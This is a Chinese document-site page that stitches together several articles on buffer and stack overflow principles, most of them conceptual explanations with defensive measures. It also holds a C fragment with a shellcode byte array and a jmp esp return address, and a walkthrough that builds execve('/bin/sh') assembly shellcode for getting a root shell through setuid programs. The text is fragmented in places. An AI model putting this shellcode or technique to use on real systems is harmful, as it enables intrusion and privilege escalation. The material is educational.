程序溢出的基础和原理

格式：docx
大小：16.89 KB
文档页数：6

下载文档原格式

溢出攻击原理

║
║-------------------------║
║ EBP ║
║-------------------------║
║ 返回地址RET ║
║-------------------------║
║ 参数空间 ║
堆栈底部-> ╰═══════════╯<-内存低端
fp=fopen("bufferover.txt","r");
p=buffer;
while((a=fgetc(fp))!='\x00')
//注意此处不能写成while((a=fgetc(fp))!=EOF),因为文件结束符
//为0xFF，而我们对应的机器码中也包含0xFF，所以我们用0x00来
#include <stdio.h>
#include <string.h>
char shellcode[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"//覆盖缓冲区的字符
"\x12\x45\xfa\x7f" //jmp esp的通用地址为7ffa4512
"\xE1\xFD\xB5\xA7\xA5\xA5\xFD\xE0\xE6\xF0\xE7\xFD\xFB\xF0\xE1\xB5\xC1\x2D\x4B\xE1"
"\x7D\xE2\x6A\x45\xFD\x7D\x96\x95\x95\x2D\xDA\x37\x7D\xE2\x6A\x45\xFD\x95\x95\x95"

缓冲区溢出攻击的基本原理

缓冲区溢出攻击的基本原理
缓冲区溢出攻击（Buffer Overflow Attack）是一种常见的安全漏洞，指的是攻击者利用输入数据的长度或格式错误，超出程序设计者预留的存储空间范围，从而写入到相邻内存空间中，进而控制程序的执行或修改程序的行为。

缓冲区溢出攻击的基本原理如下：
1.内存分配：程序在运行时会根据变量类型和长度来分配内存空间。

2.缓冲区溢出：攻击者通过向程序输入异常数据，超出了程序预留的内存空
间。

3.覆盖关键数据：溢出的数据覆盖了原本存储的数据，可能是程序的返回地
址、函数指针等关键信息。

4.控制程序行为：攻击者利用溢出的数据修改程序的执行路径，跳转到自己
准备好的恶意代码。

5.执行恶意代码：程序执行了攻击者注入的恶意代码，可能导致系统崩溃、
拒绝服务或远程执行任意命令。

为了避免缓冲区溢出攻击，开发人员可以采取以下措施：
•使用安全的编程语言和工具，如内存安全的语言（如Rust）或经过良好测试的C/C++库。

•限制输入数据的长度，确保不会超过缓冲区可容纳的大小。

•进行输入验证和过滤，确保输入数据符合预期的格式和范围。

•定期更新软件和操作系统，及时修补已知的漏洞。

•实施数据执行保护（DEP）和地址空间布局随机化（ASLR）等安全机制。

综上所述，缓冲区溢出攻击是一种常见的安全漏洞，它利用错误处理输入数据的程序中的缺陷，从而控制程序行为。

开发人员和系统管理员应该密切关注安全问题，采取相应的防护措施，以保护系统和用户的信息安全。

溢出提权原理

溢出提权原理溢出提权是一种网络攻击技术，攻击者通过利用软件或操作系统的漏洞，使内存中的数据溢出，以此来运行自己的代码，提升自己的权限，从而获取更高的系统访问权限，控制整个系统。

以下是有关溢出提权原理及其实现的详细解释：一、原理1. 缓冲区溢出缓冲区溢出是溢出提权攻击的关键。

它利用了程序设计错误，使其在接收数据时没有考虑到输入数据的长度问题。

攻击者通过给程序提供一个超出了他预期大小的输入，导致程序直接将多余的数据写入了程序的内存区域，进而导致系统的崩溃。

2. 栈溢出栈（stack）是指存储函数调用信息的一种数据结构，它是由编译器自动分配和释放内存的，用于存储局部变量、函数参数和返回地址等信息。

攻击者通过构造特定的输入，可以改变栈的内容，使程序执行到不该执行的地方，从而提升攻击者的权限。

3. 堆溢出当程序运行的时候，需要动态地分配内存，我们称之为堆内存。

攻击者可以构造恶意数据，通过堆溢出的方式覆盖循环队列，使得程序执行到攻击者事先准备好的代码段，从而达到提权的目的。

二、实现1. 利用漏洞攻击者通过针对具体的软件或操作系统中可能存在的漏洞进行攻击，知道漏洞的存在并可以利用其进行溢出提权。

2. 编写恶意代码攻击者可以编写专门的代码，利用漏洞实现溢出提权，一旦恶意代码被加载到内存中，攻击者就可以完成攻击。

3. 利用第三方工具还有一些第三方工具可以协助攻击者实现溢出提权攻击，例如Metasploit，这些工具使用已知的漏洞进行攻击，从而实现溢出提权。

总之，溢出提权是一种非常危险的攻击技术。

为了防范溢出提权攻击，软件开发人员需要对漏洞进行认真的审查和修复，用户也需要安装最新的补丁和升级以减少系统漏洞的利用。

同时，网络安全人员需要保持密切关注，及时监测和响应溢出提权攻击。

缓冲区溢出原理

缓冲区溢出原理缓冲区溢出是一种常见的安全漏洞，它利用了程序在处理数据时没有正确限制输入长度的特点。

当程序接收用户输入数据并存储在缓冲区中时，如果输入的数据超过了缓冲区所能容纳的大小，就会导致溢出。

这种溢出可能导致程序崩溃、系统崩溃，甚至是远程攻击者能够利用溢出来执行恶意代码。

缓冲区溢出的原理是利用了程序在内存中分配缓冲区时的特性。

通常，程序在内存中为缓冲区分配一块连续的内存空间，并将用户输入的数据存储在这个缓冲区中。

然而，程序并没有对用户输入的数据长度进行有效的检查和限制，导致用户可以输入超出缓冲区大小的数据。

当用户输入的数据超过缓冲区大小时，多余的数据会被存储在相邻的内存区域中。

攻击者可以利用这个特性，通过输入特定的数据，覆盖控制程序的返回地址或其他关键数据，从而控制程序的行为。

一旦攻击者成功利用缓冲区溢出漏洞，可能会导致以下问题：1. 执行任意代码：攻击者可以注入恶意代码，并使程序执行该代码，这可能导致系统被完全控制。

2. 提升权限：攻击者可以修改关键数据，包括用户权限、系统配置等，从而获得更高的权限。

3. 拒绝服务：攻击者可以通过溢出来破坏程序的正常运行，导致程序崩溃或系统崩溃，从而拒绝正常用户的服务。

为了防止缓冲区溢出，开发者应该采取以下措施：1. 输入验证：对用户输入进行有效验证和过滤，确保输入的数据长度不会超过缓冲区的大小。

2. 使用安全的库函数：使用具有长度检查的安全库函数替代容易造成溢出的不安全函数，例如使用strncpy替代strcpy。

3. 栈保护机制：启用操作系统提供的栈保护机制，如栈保护、地址空间布局随机化（ASLR）等，以减少攻击的可能性。

4. 定期修补和更新：及时安装系统和应用程序的安全补丁，以修复已知的缓冲区溢出漏洞。

通过采取上述措施，可以有效减少缓冲区溢出漏洞的风险，提高系统的安全性。

c语言缓冲区溢出原理

c语言缓冲区溢出原理摘要：1.缓冲区溢出概念2.C语言中可能导致缓冲区溢出的原因3.缓冲区溢出的防范方法4.总结正文：正文：缓冲区溢出是计算机科学中的一种常见错误，它在编程中可能导致严重的安全问题。

本文将解释缓冲区溢出的概念，探讨其原因、危害以及如何预防。

一、什么是缓冲区溢出缓冲区溢出是指程序中的缓冲区无法容纳输入的数据，从而覆盖了其他内存区域。

这种情况通常发生在程序没有正确处理输入数据长度的情况下，导致数据超过了缓冲区的容量。

二、缓冲区溢出的原因1.字符串操作函数：在C语言中，一些字符串操作函数（如gets、strcpy 等）没有对输入数据长度进行限制，可能导致缓冲区溢出。

2.动态内存分配：在使用动态内存分配函数（如malloc）分配内存时，如果未正确初始化或超量分配，可能导致缓冲区溢出。

3.函数调用：在调用函数时，如果传入的参数长度超过预期，可能导致缓冲区溢出。

三、缓冲区溢出的危害1.程序崩溃：缓冲区溢出可能导致程序崩溃，因为覆盖的内存区域可能包含程序的重要数据或代码。

2.数据损坏：缓冲区溢出可能导致数据损坏，因为覆盖的内存区域可能包含程序处理数据的正确结果。

3.安全漏洞：缓冲区溢出可能被恶意利用，攻击者可以通过注入恶意数据来覆盖内存中的安全关键数据，如密码、加密密钥等。

四、如何预防缓冲区溢出1.检查输入数据长度：在对输入数据进行处理之前，应检查数据长度，确保不会超过缓冲区容量。

2.使用安全的字符串操作函数：尽量使用带有长度限制的字符串处理函数，如strncpy、strncat等。

3.初始化缓冲区：在使用动态内存分配时，应初始化缓冲区，并确保分配的内存空间足够大。

4.使用边界检查：在编写程序时，对输入数据进行边界检查，确保数据长度符合预期。

栈溢出漏洞原理

栈溢出漏洞原理栈溢出（Stack Overflow）是一种常见的安全漏洞，它利用了程序在执行过程中使用的栈内存空间有限的特性。

栈溢出漏洞的原理是攻击者通过向程序输入过多的数据，超出了栈内存所能容纳的范围，从而覆盖了栈中的其他数据甚至覆盖了函数返回地址，从而实现任意代码执行的攻击。

要理解栈溢出漏洞的原理，首先需要了解栈的概念。

在计算机中，栈是一种数据结构，用来存储函数的局部变量、函数的参数以及函数调用的返回地址等信息。

栈的特点是先进后出，也就是说最后进入栈的数据最先被访问到。

当一个函数被调用时，会将函数的参数和局部变量等数据压入栈中。

而函数执行完毕后，会通过栈中保存的返回地址返回到调用函数的位置。

栈溢出漏洞就是在这个过程中利用了栈的特性来进行攻击。

栈溢出漏洞的攻击方式通常是通过向程序输入过长的数据，超出了预留的栈内存空间大小。

由于栈内存的连续性，超出的数据会覆盖栈中相邻的数据。

如果这些相邻的数据是保存函数返回地址的部分，那么攻击者就可以通过修改返回地址的值，使程序执行任意指定的代码。

具体来说，当攻击者向程序输入的数据超出了栈内存的大小时，多余的数据会被写入到栈中相邻的内存区域。

当函数执行完毕，尝试返回到返回地址所指向的位置时，由于返回地址被篡改，程序就会跳转到攻击者指定的代码，从而实现了攻击者的意图。

栈溢出漏洞的危害非常大，攻击者可以利用它执行任意代码，包括删除、修改、读取敏感数据，甚至控制整个系统。

为了防止栈溢出漏洞的发生，开发人员需要注意以下几点：1. 输入验证：对用户输入的数据进行验证和过滤，确保不会超出预期的长度。

2. 缓冲区溢出检测：使用一些工具来检测程序中是否存在缓冲区溢出的漏洞，及时修复。

3. 栈保护机制：一些编程语言和操作系统提供了栈保护机制，可以在栈溢出时检测到异常并中断程序的执行。

4. 代码审查：进行代码审查，查找潜在的栈溢出漏洞，并修复之。

5. 使用安全的编程语言和框架：一些编程语言和框架自带了一些安全机制，能够有效地防止栈溢出漏洞的发生。

栈溢出原理

栈溢出原理
栈溢出是指在程序执行时，当向栈中写入数据时，数据超出了栈的边界，从而导致覆盖了其他重要的数据。

这种情况通常发生在程序的漏洞被攻击者利用的时候。

栈溢出的原理可以通过以下几个步骤来解释：
1. 在程序执行时，每个函数都会在栈上分配一定的内存空间，用来存储局部变量、函数参数、返回地址等信息。

2. 当函数被调用时，系统会将当前函数的返回地址压入栈中，以便在函数执行完毕后能够返回到调用它的位置继续执行。

3. 如果在函数执行过程中，程序向栈中写入的数据超出了栈的边界，就会导致这些数据覆盖了其他重要的信息，如返回地址等。

4. 攻击者可以利用这个漏洞，通过构造特定的数据，将恶意代码的地址写入到被覆盖的返回地址中，从而实现代码执行的控制权转移。

为了避免栈溢出漏洞，程序员可以采取以下措施：
1. 检查输入数据的长度，确保不会超过栈的边界。

2. 使用安全的字符串处理函数，如strcpy_s等，以避免缓冲区溢出。

3. 避免使用可执行代码作为函数参数，以避免被攻击者利用。

4. 使用栈保护技术，如Canary等，以检测和防止栈溢出攻击。

总之，了解栈溢出的原理和防范措施对于程序员来说是非常重要的。

只有不断加强代码的安全性和可靠性，才能有效地避免安全漏洞
的出现。

缓冲区溢出-原理和简单利用-概述说明以及解释

缓冲区溢出-原理和简单利用-概述说明以及解释1.引言概述部分是文章的开篇，旨在引入读者对于缓冲区溢出问题的背景和概念。

下面是概述部分的内容：1.1 概述在计算机科学和网络安全领域中，缓冲区溢出（Buffer Overflow）是一种常见的安全漏洞，它可能导致系统崩溃、数据泄露、远程命令执行等严重后果。

本文将介绍缓冲区溢出的原理和简单利用方法。

缓冲区溢出指的是当向一个缓冲区写入数据时，超出了该缓冲区所能容纳的大小，导致溢出的数据覆盖到相邻的内存区域。

这种溢出可能会覆盖控制流程信息，改变程序执行路径，从而使攻击者能够执行恶意代码。

缓冲区溢出是一种经典的安全漏洞，其发现最早可以追溯到20世纪70年代。

尽管多年来在软件和系统的开发过程中进行了一系列的改进和加固，但仍然存在很多软件和系统容易受到缓冲区溢出攻击的漏洞存在。

正因如此，了解缓冲区溢出的原理和简单利用方法对于计算机科学和网络安全从业人员来说是至关重要的。

本文的主要目的是帮助读者理解缓冲区溢出的原理，并介绍常见的利用方法。

在深入研究和了解缓冲区溢出的背景之后，读者将能够更好地理解和应对这种常见的安全威胁。

接下来的章节将分别介绍缓冲区溢出的原理，并提供一些简单的利用方法作为案例。

最后，我们将总结本文的内容，并进一步讨论缓冲区溢出的意义和应对措施。

通过阅读本文，我们希望读者能够加深对于缓冲区溢出问题的理解，提高对于软件和系统安全的意识，并能够采取相应的措施来预防和应对这种安全漏洞。

让我们一起深入探索缓冲区溢出的原理和简单利用方法吧！文章结构是指文章整体组织的安排和框架。

一个良好的文章结构可以帮助读者更好地理解和吸收文章内容。

本文主要讨论缓冲区溢出的原理和简单利用方法，因此文章结构如下：1. 引言1.1 概述引入缓冲区溢出的基本概念和定义，解释缓冲区溢出在计算机领域的重要性和普遍存在的问题。

1.2 文章结构介绍本文的文章结构以及各个部分的内容安排，方便读者了解整个文章的组织。

pwn栈溢出例题

pwn栈溢出例题一、引言在计算机安全领域，栈溢出是一种常见的漏洞类型。

它发生在程序的栈内存中，是由于程序在处理输入数据时没有进行足够的检查和限制，导致栈内存被填充至溢出，从而引发程序崩溃或被恶意攻击者利用。

本文将介绍栈溢出原理、pwn栈溢出方法以及相关例题解析，旨在帮助读者提高对栈溢出漏洞的认识和防范能力。

二、栈溢出概念与原理1.栈空间布局在计算机系统中，栈空间是用于存储临时数据和函数调用信息的一种内存区域。

栈空间按照后进先出（LIFO）的原则分配和释放。

通常，栈空间由栈底、栈顶和栈帧组成。

栈底是栈空间的最底部，栈顶是栈空间的最顶部，栈帧是栈中每个函数调用所占用的内存区域。

2.栈溢出条件栈溢出发生的条件有：（1）程序在处理输入数据时，没有对数据长度进行限制，导致栈空间被填充至溢出。

（2）程序在处理输入数据时，没有对数据进行适当的校验，导致输入数据中含有恶意代码。

（3）程序中的指针没有进行有效性检查，导致指向无效内存地址。

3.栈溢出危害栈溢出可能导致以下后果：（1）程序崩溃：栈溢出导致栈空间不足，程序无法正常执行，最终崩溃。

（2）数据损坏：栈溢出可能覆盖程序中的重要数据，导致数据损坏。

（3）系统权限提升：攻击者利用栈溢出漏洞，可以将恶意代码注入到系统内核或其他高级权限区域，从而提升系统权限，进一步实施攻击。

（4）信息泄漏：栈溢出可能导致程序中的敏感信息泄漏。

三、pwn栈溢出方法1.缓冲区溢出缓冲区溢出是指程序在处理输入数据时，没有考虑到数据长度，导致溢出的数据覆盖栈内存中的重要数据或程序执行流程。

常见的缓冲区溢出漏洞有：（1）题目描述：给定一个程序，接收用户输入的字符串，并将其打印到屏幕上。

（2）解题思路：输入一个包含恶意代码的字符串，使其覆盖返回地址，从而控制程序执行流程。

（3）解决方案：在程序中加入数据校验，确保输入数据长度不超过预设值。

2.格式化字符串漏洞格式化字符串漏洞是指程序在处理格式化字符串时，没有对输入数据进行有效性检查，导致恶意代码注入。

缓冲区溢出攻击原理

缓冲区溢出攻击原理一、缓冲区溢出攻击原理缓冲区溢出是一种非常普遍、非常危险的漏洞，在各种操作系统、应用软件中广泛存在。

利用缓冲区溢出攻击，可以导致程序运行失败、系统当机、重新启动等后果。

更为严重的是，可以利用它执行非授权指令，甚至可以取得系统特权，进而进行各种非法操作。

缓冲区溢出是一种系统攻击的手段，通过往程序的缓冲区写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，使程序转而执行其它指令，以达到攻击的目的。

据统计，通过缓冲区溢出进行的攻击占所有系统攻击总数的80%以上。

知道了这个数据我非常震惊，以前进行的活动大都是找各方面的黑客软件然后学习这个软件怎么用，但是众所周知，攻击型的黑客软件都是各大杀毒软件的活靶子，基本上几天就不能用了，所以学习了这些软件的原理，我也能写几行代码，不再依赖黑客软件，就算汇编语言难掌握，也可以保存好常用的代码，其使用方法是比较简单的，下面是我学习的过程，由于没有经验，肯定有不少疏漏，也肯定不少地方绕了弯路，但自己学的过程中也获得了更多乐趣和收货时的喜悦，下面是具体介绍。

我用的是windows xp sp3编程软件是vc6.0。

还用到了olldbg2.0。

都是很常用的工具。

先介绍一下缓冲区溢出攻击的基础知识储备，进程内存空间是我最先接触的，现在看来也是最必要的基础，windows系统核心内存区间0xFFFFFFFF~0x80000000 (4G~2G)为Win32操作系统保留用户内存区间0x00000000~0x80000000 (2G~0G)堆: 动态分配变量(malloc), 向高地址增长进程使用的内存可以按照功能大致分成以下4 个部分。

（1）代码区：这个区域存储着被装入执行的二进制机器代码，处理器会到这个区域取指并执行。

（2）数据区：用于存储全局变量等。

（3）堆区：进程可以在堆区动态地请求一定大小的内存，并在用完之后归还给堆区。

动态分配和回收是堆区的特点。

1、下载文档前请自行甄别文档内容的完整性，平台不提供额外的编辑、内容补充、找答案等附加服务。
2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
3、如文档侵犯您的权益，请联系客服反馈,我们会尽快为您处理(人工客服工作时间：9:00-18:30)。

程序溢出的基础和原理一：基础知识计算机内存运行分配的区域分为3个程序段区域：不允许写的数据段区域：静态全局变量是位于数据段并且在程序开始运行的时候被加载堆栈区域：放置程序的动态的用于计算的局部和临时变量则分配在堆栈里面和在过程调用中压入的返回地址数据。

堆栈是一个先入后出的队列。

一般计算机系统堆栈的方向与内存的方向相反。

压栈的xx作push＝ESP－4，出栈的xx作是pop=ESP+4. 在一次函数调用中，堆栈中将被依次压入：参数，返回地址，EBP。

如果函数有局部变量，接下来，就在堆栈中开辟相应的空间以构造变量。

函数执行结束，这些局部变量的内容将被丢失。

但是不被清除。

在函数返回的时候，弹出EBP，恢复堆栈到函数调用的地址,弹出返回地址到EIP以继续执行程序。

在C语言程序中，参数的压栈顺序是反向的。

比如func（a,b,c）。

在参数入栈的时候，是：先压c，再压b,最后a.在取参数的时候，指令执行的图例：指令区域执行程序区0 1 2 348 调用100处的函数，参数1（3位），2（10位）C10 0 1 2 3100 执行处理10410810C110 返回调用堆栈区域0 1 2 3如果EBP分配的空间不够xx作就是产生溢出的地方200 保存以前的EBP4位（数据段的指针，用于可以使用局部动态变量）现在的EBP等于当前的ESP-动态数据的大小值，ESP=200204 0C 00 00 00此处是程序的返回地址208 参数1，填充1位20C 参数2填充2位210讲解例子WIN下的程序DEMO，演示参数导致的返回地址的变化讲清主要4位的填充问题另外溢出还会导致数据段的改变3：如何利用堆栈溢出原理可以概括为：由于字符串处理函数（gets，strcpy等等）没有对数组越界加以监视和限制，我们利用字符数组写越界，覆盖堆栈中的老元素的值，就可以修改返回地址。

在DEMO的例子中，这导致CPU去访问一个不存在的指令，结果出错。

事实上，我们已经完全的控制了这个程序下一步的动作。

如果我们用一个实际存在指令地址来覆盖这个返回地址，CPU就会转而执行我们的指令。

那么有什么用呢，就算使得我们的程序可以跳转执行一些代码，如何用他来突破系统限制来获得权限呢？二：系统权限知识UNIX系统在运行的时候的权限检查主要是根据UID，GID，SID 三个标来检查的，主要根据SID来检查权限SU系统调用就是SID变成SU的对象S粘贴位使得运行程序的人具有该程序拥有者一样的权限中断ROOT的S粘贴位的程序就可以获得超级用户的权限，SID位置没被调用返回修改回来。

VI的S粘贴位可以中断的例子在UINX系统中，我们的指令可以执行一个shell，这个shell将获得和被我们堆栈溢出的程序相同的权限。

如果这个程序是setuid 的，那么我们就可以获得root shell。

三：溢出突破权限的实现首先要编写SHELLCODE的2进制代码作为溢出的参数进行传入：shellcode的C程序注意：execve函数将执行一个程序。

他需要程序的名字地址作为第一个参数。

一个内容为该程序的argv（argv[n-1]=0）的指针数组作为第二个参数，以及(char*) 0作为第三个参数。

我们来看以看execve的汇编代码：0x804ce7c <__execve>: push %ebp '保存以前的数据段地址0x804ce7d <__execve+1>: mov %esp,%ebp '使得当前数据段指向堆栈0x804ce7f <__execve+3>: push %edi0x804ce80 <__execve+4>: push %ebx '保存0x804ce81 <__execve+5>: mov 0x8(%ebp),%edi 'ebp+8是第一个参数"/bin/sh\0"0x804ce84 <__execve+8>: mov $0x0,%eax '清00x804ce89 <__execve+13>: test %eax,%eax0x804ce8b <__execve+15>: je 0x804ce92 <__execve+22>0x804ce8d <__execve+17>: call 0x00x804ce92 <__execve+22>: mov 0xc(%ebp),%ecx '设置NAME[0]参数，4字节对齐0x804ce95 <__execve+25>: mov 0x10(%ebp),%edx，设置NAME[1]参数，4字节对齐0x804ce98 <__execve+28>: push %ebx0x804ce99 <__execve+29>: mov %edi,%ebx0x804ce9b <__execve+31>: mov $0xb,%eax '设置XB号调用0x804cea0 <__execve+36>: int $0x80 '调用执行0x804cea2 <__execve+38>: pop %ebx0x804cea3 <__execve+39>: mov %eax,%ebx0x804cea5 <__execve+41>: cmp $0xfffff000,%ebx0x804ceab <__execve+47>: jbe 0x804cebb <__execve+63>0x804cead <__execve+49>: call 0x8048324 <__errno_location>0x804ceb2 <__execve+54>: neg %ebx0x804ceb4 <__execve+56>: mov %ebx,(%eax)0x804ceb6 <__execve+58>: mov $0xffffffff,%ebx0x804cebb <__execve+63>: mov %ebx,%eax0x804cebd <__execve+65>: lea 0xfffffff8(%ebp),%esp0x804cec0 <__execve+68>: pop %ebx0x804cec1 <__execve+69>: pop %edi0x804cec2 <__execve+70>: leave0x804cec3 <__execve+71>: ret 精练的调用方法是0x804ce92 <__execve+22>: mov 0xc(%ebp),%ecx '设置NAME[0]参数，4字节对齐0x804ce95 <__execve+25>: mov 0x10(%ebp),%edx，设置NAME[1]参数，4字节对齐0x804ce9b <__execve+31>: mov $0xb,%eax '设置XB号调用0x804cea0 <__execve+36>: int $0x80 '调用执行另外要执行一个exit（）系统调用，结束shellcode的执行。

0x804ce60 <_exit>: mov %ebx,%edx0x804ce62 <_exit+2>: mov 0x4(%esp,1),%ebx 设置参数00x804ce66 <_exit+6>: mov $0x1,%eax '1号调用0x804ce6b <_exit+11>: int $0x800x804ce6d <_exit+13>: mov %edx,%ebx0x804ce6f <_exit+15>: cmp $0xfffff001,%eax0x804ce74 <_exit+20>: jae 0x804d260 <__syscall_error> 那么总结一下，合成的汇编代码为：mov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80mov 0x4(%esp,1),%ebxmov $0x1,%eaxint $0x80 但问题在于我们必须把这个程序作为字符串的参数传给溢出的程序进行调用，如何来分配和定位字符串" /bin/sh",还得有一个name数组。

我们可以构造它们出来，可是，在shellcode中如何知道它们的地址呢？每一次程序都是动态加载，字符串和name数组的地址都不是固定的。

利用call压入下一条语句的返回地址，把数据作为下一条指令我们就可以达到目的。

Jmp CALLPopl %esi '利用CALL弹出压入的下一条语句的地址，其实就是我们构造的字符串的地址movb $0x0,0x7(%esi) '输入0的字符串为结尾mov %esi,0X8 (%esi) '构造NAME数组，放如字串的地址作为NAME[0]mov $0x0,0xc(%esi) '构造NAME[1]为NULL，NAME[0]为4位地址，所以偏移为0xc mov %esi,%ebx '设置数据段开始的地址leal 0x8(%esi),%ecx '设置参数1leal 0xc(%esi),%edx '设置参数2mov $0xb,%eax '设置调用号int $0x80 '调用mov $0x0,%ebxmov $0x1,%eaxint $0x80Call popl.string \"/bin/sh\" 然后通过C编译器编写MYSHELLASM.C运行出错，原因代码段不允许进行修改，但是对于我们溢出是可以的，原因在于溢出是在数据段运行的，通过GDB查看16进制码，倒出ASCII字符写出TEST.C程序来验证MYSHELLASM可以运行ret = (int *)&ret + 2; //ret 等于main（）执行完后的返回系统的地址//(＋2是因为：有pushl ebp ,否则加1就可以了。